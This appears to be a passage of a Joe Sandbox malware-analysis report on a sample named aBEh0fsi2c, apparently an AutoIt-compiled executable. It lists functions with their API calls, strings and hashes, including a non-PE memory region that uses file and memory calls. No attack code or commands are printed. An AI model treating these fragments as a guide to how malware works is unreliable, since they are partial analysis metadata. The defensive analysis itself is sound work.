Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID: 8]
API String ID: 1438897964-438778366
Opcode ID: a3ac00fff01ca316bcc29c4708e9ff73ad8aa5bdfaa4624fb4ddface27b7cf64
Instruction ID: 37539c4cc2624dfb2c6dbd2fc15eeffed4c46528cedee32ec6ea63b875383793
Opcode Fuzzy Hash: a3ac00fff01ca316bcc29c4708e9ff73ad8aa5bdfaa4624fb4ddface27b7cf64
Instruction Fuzzy Hash: 5A118C71A08341DFD711EF28DC4591ABBE8EB85750F50856EF0808B2B1DBB09646CB96

Function 003C445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0039E398), ref: 003C446A
FindFirstFileW.KERNELBASE(?,?), ref: 003C447B
FindClose.KERNEL32(00000000), ref: 003C448B

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: e24e9fd7f7d2c90a20565f91a74e2ace94db03e9a983ab80c05e88bd6d497b18
Instruction ID: 260b61b3aa551640694d1690b2e11948ab01f506d4f047667f99b47802ec9c9e
Opcode Fuzzy Hash: e24e9fd7f7d2c90a20565f91a74e2ace94db03e9a983ab80c05e88bd6d497b18
Instruction Fuzzy Hash: BAE0D8378145406B82256B38EC4DAE9775C9F05335F204B19F935C50D0E7B49D009695

Function 003709D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00370A5B
timeGetTime.WINMM ref: 00370D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00370E53
Sleep.KERNEL32(0000000A), ref: 00370E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00370EFA
DestroyWindow.USER32 ref: 00370F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00370F20
Sleep.KERNEL32(0000000A,?,?), ref: 003A4E83
TranslateMessage.USER32(?), ref: 003A5C60
DispatchMessageW.USER32(?), ref: 003A5C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003A5C82

Strings

pbB, xrefs: 003A4FAE
pbB, xrefs: 003A57B4
pbB, xrefs: 003A5003
@GUI_WINHANDLE, xrefs: 003A4F8F
@TRAY_ID, xrefs: 003A578F
@GUI_CTRLID, xrefs: 003A4F3A
@GUI_CTRLHANDLE, xrefs: 003A4FE4
@COM_EVENTOBJ, xrefs: 003A54F0
pbB, xrefs: 003A4F59

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbB$pbB$pbB$pbB
API String ID: 4212290369-707248984
Opcode ID: b11cd91aebe7ce64f27b304e8c2a7fa6f62be64bb836472c43b77f71018249a8
Instruction ID: 4652b29cb5ca71d7e33490bae53b8fbf11b6f7bd20c2cfa66235d067333820af
Opcode Fuzzy Hash: b11cd91aebe7ce64f27b304e8c2a7fa6f62be64bb836472c43b77f71018249a8
Instruction Fuzzy Hash: 17B2C070608741DFD73ADF24C884BAAB7E4FF86304F15891DE4999B2A1CB75E844CB92

Function 003C9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003C8F5F: __time64.LIBCMT ref: 003C8F69

Part of subcall function 00364EE5: _fseek.LIBCMT ref: 00364EFD

__wsplitpath.LIBCMT ref: 003C9234

Part of subcall function 003840FB: __wsplitpath_helper.LIBCMT ref: 0038413B

_wcscpy.LIBCMT ref: 003C9247
_wcscat.LIBCMT ref: 003C925A
__wsplitpath.LIBCMT ref: 003C927F
_wcscat.LIBCMT ref: 003C9295
_wcscat.LIBCMT ref: 003C92A8

Part of subcall function 003C8FA5: _memmove.LIBCMT ref: 003C8FDE
Part of subcall function 003C8FA5: _memmove.LIBCMT ref: 003C8FED

_wcscmp.LIBCMT ref: 003C91EF

Part of subcall function 003C9734: _wcscmp.LIBCMT ref: 003C9824
Part of subcall function 003C9734: _wcscmp.LIBCMT ref: 003C9837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003C9452
_wcsncpy.LIBCMT ref: 003C94C5
DeleteFileW.KERNEL32(?,?), ref: 003C94FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003C9511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003C9522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003C9534

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 16a42f4349dd00d1ded853d429d3d0b09abe873e9988f78bb338d2074b5a0819
Instruction ID: 9b156f3ba1a701b30a30a6a832e40f11cf0e5b6184617a5f3fb643c380d86c45
Opcode Fuzzy Hash: 16a42f4349dd00d1ded853d429d3d0b09abe873e9988f78bb338d2074b5a0819
Instruction Fuzzy Hash: 32C12AB1D00219AADF22DF95CC85FDEBBBDAF45310F0044AAF609EA151DB309E448F65

Function 0036301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00363074
RegisterClassExW.USER32(00000030), ref: 0036309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003630AF
InitCommonControlsEx.COMCTL32(?), ref: 003630CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003630DC
LoadIconW.USER32(000000A9), ref: 003630F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00363101

Strings

0, xrefs: 00363056
AutoIt v3 GUI, xrefs: 00363090
TaskbarCreated, xrefs: 003630A4
+, xrefs: 0036305D

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 8001da4f566df5225480be6b25409729359a940a66bc5266e7201cd2061d65e8
Instruction ID: 143c8d3253955d3489b7f89cb32abd473717c9681cbb89b4750b18f213aa4bf6
Opcode Fuzzy Hash: 8001da4f566df5225480be6b25409729359a940a66bc5266e7201cd2061d65e8
Instruction Fuzzy Hash: ED3149B1940349EFDB619FA4D885AD9BBF4FB09310F10426AE580EA2A0D3F50596CF64

Function 00363A46 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00363A50
LoadCursorW.USER32(00000000,00007F00), ref: 00363A5F
LoadIconW.USER32(00000063), ref: 00363A76
LoadIconW.USER32(000000A4), ref: 00363A88
LoadIconW.USER32(000000A2), ref: 00363A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00363AC0
RegisterClassExW.USER32(?), ref: 00363B16

Part of subcall function 00363041: GetSysColorBrush.USER32(0000000F), ref: 00363074
Part of subcall function 00363041: RegisterClassExW.USER32(00000030), ref: 0036309E
Part of subcall function 00363041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003630AF
Part of subcall function 00363041: InitCommonControlsEx.COMCTL32(?), ref: 003630CC
Part of subcall function 00363041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003630DC
Part of subcall function 00363041: LoadIconW.USER32(000000A9), ref: 003630F2
Part of subcall function 00363041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00363101

Strings

0, xrefs: 00363AF4
8], xrefs: 00363AA1
AutoIt v3, xrefs: 00363B05
#, xrefs: 00363AFB

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$8]$AutoIt v3
API String ID: 423443420-3199686076
Opcode ID: 81734d4539b8539e1245788b4183dd7031fac49495a022f2aae86bc3c8aad939
Instruction ID: fc92b9fb9fcbad9a3aa38efdc8146e895de4a2c62bbea1524ffcbc1025864964
Opcode Fuzzy Hash: 81734d4539b8539e1245788b4183dd7031fac49495a022f2aae86bc3c8aad939
Instruction Fuzzy Hash: CC215E74E00304EFEB21DFA4EC49BAD7BB4FB08711F4041AAF500AA2E1D3B556518FA8

Function 00363041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00363074
RegisterClassExW.USER32(00000030), ref: 0036309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003630AF
InitCommonControlsEx.COMCTL32(?), ref: 003630CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003630DC
LoadIconW.USER32(000000A9), ref: 003630F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00363101

Strings

0, xrefs: 00363056
AutoIt v3 GUI, xrefs: 00363090
TaskbarCreated, xrefs: 003630A4
+, xrefs: 0036305D

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 215e3f0e4bdfbbee28bb5a7d3f92d6d167f2be96984b9af3cbb2d19bf124e276
Instruction ID: a83a36bf51d28092fd6566a0540cdcc40262a56a6003091d2b2b91a10404afca
Opcode Fuzzy Hash: 215e3f0e4bdfbbee28bb5a7d3f92d6d167f2be96984b9af3cbb2d19bf124e276
Instruction Fuzzy Hash: AB21FCB1A01258EFDB21DF94EC88BDD7BF8FB08710F00422AF510AA2A0D7F145558F95

Function 0036708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00364706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004252F8,?,003637AE,?), ref: 00364724

Part of subcall function 0038050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00367165), ref: 0038052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003671A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0039E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0039E909
RegCloseKey.ADVAPI32(?), ref: 0039E947
_wcscat.LIBCMT ref: 0039E9A0

Strings

Software\AutoIt v3\AutoIt, xrefs: 0036719E
\Include\, xrefs: 00367165
Include, xrefs: 0039E8BF, 0039E900
\, xrefs: 0039E9C3

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: ba89680d379d32e3a486e4d5ba5581a965b4dfab2a8585ec3deac6526a074b6b
Instruction ID: 465104c37e8d7e4eedc0f4df5c775388c764b367aeb8a2f414afa7b227ff04b5
Opcode Fuzzy Hash: ba89680d379d32e3a486e4d5ba5581a965b4dfab2a8585ec3deac6526a074b6b
Instruction Fuzzy Hash: 04719E71608301DEC716EF25E8819ABBBE8FF84310F81497EF4458B1A0EB709949CB66

Function 00363633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 003636D2
KillTimer.USER32(?,00000001), ref: 003636FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0036371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0036372A
CreatePopupMenu.USER32 ref: 0036373E
PostQuitMessage.USER32(00000000), ref: 0036374D

Strings

%?, xrefs: 0039D081, 0039D0CF
TaskbarCreated, xrefs: 00363725

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%?
API String ID: 129472671-4267315211
Opcode ID: 35ae6c5a70dd0119b869c6814ee630708d04a03d98cc6c36d59ef27dca5c6525
Instruction ID: 849c0b9f61bea13db480f04c8b2583559200590866e0c977d6d6ba67b42f44ed
Opcode Fuzzy Hash: 35ae6c5a70dd0119b869c6814ee630708d04a03d98cc6c36d59ef27dca5c6525
Instruction Fuzzy Hash: 3A4146B2300545BBDF336F28EC8AB793B58EB01300F948135F5029A2E9CAB49E519779

Function 00363766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMDLINERAW, xrefs: 003637FB
RB, xrefs: 0039D213
/AutoIt3ExecuteScript, xrefs: 003638BC
CMDLINE, xrefs: 00363822
/AutoIt3OutputDebug, xrefs: 00363892
/AutoIt3ExecuteLine, xrefs: 003638A7
/ErrorStdOut, xrefs: 0036387D
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 003637AE

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RB
API String ID: 1825951767-219029296
Opcode ID: 8e9d44c69a79b7cc158ad7fa0e4396a30b15afc690eba5d377fadb85e87c0f0b
Instruction ID: 0ed538ab04a73d891072ce89ba2e00ca2a7276d2f0c7ef3855ae583cb57c9ad9
Opcode Fuzzy Hash: 8e9d44c69a79b7cc158ad7fa0e4396a30b15afc690eba5d377fadb85e87c0f0b
Instruction Fuzzy Hash: F5A16E7290022D9ACF16EBA0DC95AFEB778BF15310F40852AF415BB195DF745A08CB60

Function 0036F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00380162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00380193
Part of subcall function 00380162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0038019B
Part of subcall function 00380162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003801A6
Part of subcall function 00380162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003801B1
Part of subcall function 00380162: MapVirtualKeyW.USER32(00000011,00000000), ref: 003801B9
Part of subcall function 00380162: MapVirtualKeyW.USER32(00000012,00000000), ref: 003801C1

Part of subcall function 003760F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0036F930), ref: 00376154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0036F9CD
OleInitialize.OLE32(00000000), ref: 0036FA4A
CloseHandle.KERNEL32(00000000), ref: 003A45C8

Strings

SB, xrefs: 0036F7EB
<WB, xrefs: 0036F930
%?, xrefs: 0036F796, 0036F7A8, 0036F96E, 0036FA51
\TB, xrefs: 0036F7F7

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <WB$\TB$%?$SB
API String ID: 1986988660-697478888
Opcode ID: c0caf8b01a9fcb540e58e6578fc6754caaf72064133d6dfa544f67a887c019db
Instruction ID: 4c7b18dc296dc458e6f460f84dc2938dd7c0807612e78b3ab77756d5284a18e7
Opcode Fuzzy Hash: c0caf8b01a9fcb540e58e6578fc6754caaf72064133d6dfa544f67a887c019db
Instruction Fuzzy Hash: 5D81ADB0B01A40DFC3A5EF29B945729BBE5FB983167D0813AD418CB261EBB44586CF19

Function 00E78AC8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E78B99
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E78DBF

Memory Dump Source

Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction ID: 25c03d8cc6147b443a7d957cc8847a85c5db61433ace00e310e688b49cdea95a
Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction Fuzzy Hash: 90A14970E40209EBDB14CFA4C998BEEBBB5FF58304F209559E605BB280DB759A40CF65

Function 003639D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00363A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00363A24
ShowWindow.USER32(00000000,?,?), ref: 00363A38
ShowWindow.USER32(00000000,?,?), ref: 00363A41

Strings

edit, xrefs: 00363A1E
AutoIt v3, xrefs: 003639FB, 00363A00, 00363A01

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 910183feb34e7371dfe001fa80f7bc9c2bc65a5129808d8a47ba5aaafd423469
Instruction ID: 49c78bc4eec7e1a72a358853faa8de252a036114c085a0840924e96ff3abe3c7
Opcode Fuzzy Hash: 910183feb34e7371dfe001fa80f7bc9c2bc65a5129808d8a47ba5aaafd423469
Instruction Fuzzy Hash: 7FF03A706002A0BEEA3157236C48E7B2E7DD7C6F60F4001BAB900E61F0C2B10842CEB4

Function 00E78878 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E78768: Sleep.KERNELBASE(000001F4), ref: 00E78779

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E789B2

Strings

RDLU1J3NPNTCYN3TEENNOEFQ50YHL, xrefs: 00E78A15, 00E78A18

Memory Dump Source

Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd

Similarity

API ID: CreateFileSleep
String ID: RDLU1J3NPNTCYN3TEENNOEFQ50YHL
API String ID: 2694422964-1661741281
Opcode ID: 7322594a95749a70dcad5d28f1a76852be4af8685717d9a387dcdc563173f2ca
Instruction ID: 26a778ac2523d4a657c1ea98deddd90cb8610a3edf92b1c9a23ab8871be4346a
Opcode Fuzzy Hash: 7322594a95749a70dcad5d28f1a76852be4af8685717d9a387dcdc563173f2ca
Instruction Fuzzy Hash: 2D617370D04288DAEF11DBF4C958BEEBBB4AF15304F144199E6497B2C1D7B90B48CB66

Function 0036407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0039D3D7

Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06

_memset.LIBCMT ref: 003640FC
_wcscpy.LIBCMT ref: 00364150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00364160

Strings

Line: , xrefs: 0039D400

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
